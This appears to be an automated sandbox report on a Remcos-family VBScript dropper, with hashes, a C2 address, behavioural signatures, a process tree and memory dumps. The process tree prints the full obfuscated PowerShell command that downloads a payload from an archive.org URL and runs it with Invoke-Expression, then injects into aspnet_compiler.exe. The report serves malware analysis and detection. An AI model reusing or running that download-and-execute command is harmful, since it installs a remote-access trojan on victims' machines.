Analysis
max time kernel: 149s
max time network: 150s
platform: windows10_x64
resource: win10v20210410
submitted: 21-04-2021 14:40
Static task: static1
Behavioral task: behavioral1 (sample Appraisa.vbs, resource win7v20210408)
Behavioral task: behavioral2 (sample Appraisa.vbs, resource win10v20210410)
Behavioral task: behavioral3 (sample Property.hta, resource win7v20210410)
General
Target: Appraisa.vbs
Size: 662B
MD5: 2e95d045ff86903502b52f5fd0976aad
SHA1: c74e479ff249f1e8c248b8a67e318a61b1f1d5e4
SHA256: dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
SHA512: 0427fa613d91d41c98dfb7d9a964c74857813959f427eb060a1a39c2cf289235aaa0aec6015cea8d7bd16da1e14bae3ba88c998780d33ea6faf9d0b8102264df
Malware Config
Extracted family: remcos
C2: 194.5.97.183:8888
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid  process
  8     632  powershell.exe
  18    632  powershell.exe
  20    632  powershell.exe

Suspicious use of SetThreadContext (1 IoC)
  description            pid   process         target pid  target process
  set thread context of  1864  powershell.exe  2904        aspnet_compiler.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid   process
  632   powershell.exe  (3 entries)
  1864  powershell.exe  (3 entries)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  632   powershell.exe
  Token: SeDebugPrivilege  1864  powershell.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid   process
  2904  aspnet_compiler.exe

Suspicious use of WriteProcessMemory (16 IoCs)
  description         pid   process         target pid  target process
  wrote to memory of  3968  WScript.exe     632         powershell.exe       (2 entries)
  wrote to memory of  632   powershell.exe  1864        powershell.exe       (2 entries)
  wrote to memory of  1864  powershell.exe  2904        aspnet_compiler.exe  (12 entries)
Processes

C:\Windows\System32\WScript.exe
  command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisa.vbs"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Public\ Microsoft.ps1
  MD5: eda0264cc0baa7804ce2a32a99aa9b98
  SHA1: 274b4d04e802370cac624649ea30149dded4e053
  SHA256: 950cc79c3173d2a1ad76a7b8e64c9100ca929caf0201396758380ff2d712680f
  SHA512: 43f6dd07e297c157f54147aa34512b4812f2650f990865c81181e14d379bf12352fcc3c2d20fbfb535d8bf2a3b5ebc7ab6aa0cd47ab498f0d1f5818e41bf9a74
Memory dumps (file, size)
  memory/632-114-0x0000000000000000-mapping.dmp
  memory/632-120-0x0000020C6EED0000-0x0000020C6EED1000-memory.dmp    4KB
  memory/632-123-0x0000020C6FA30000-0x0000020C6FA31000-memory.dmp    4KB
  memory/632-124-0x0000020C6EF90000-0x0000020C6EF92000-memory.dmp    8KB
  memory/632-125-0x0000020C6EF93000-0x0000020C6EF95000-memory.dmp    8KB
  memory/632-130-0x0000020C6EF96000-0x0000020C6EF98000-memory.dmp    8KB
  memory/1864-145-0x000002099A983000-0x000002099A985000-memory.dmp   8KB
  memory/1864-144-0x000002099A980000-0x000002099A982000-memory.dmp   8KB
  memory/1864-160-0x000002099B500000-0x000002099B501000-memory.dmp   4KB
  memory/1864-135-0x0000000000000000-mapping.dmp
  memory/1864-177-0x000002099B4B0000-0x000002099B4C8000-memory.dmp   96KB
  memory/1864-184-0x000002099A986000-0x000002099A988000-memory.dmp   8KB
  memory/2904-182-0x0000000000400000-0x0000000000478000-memory.dmp   480KB
  memory/2904-183-0x000000000042EEEF-mapping.dmp
  memory/2904-188-0x0000000000400000-0x0000000000478000-memory.dmp   480KB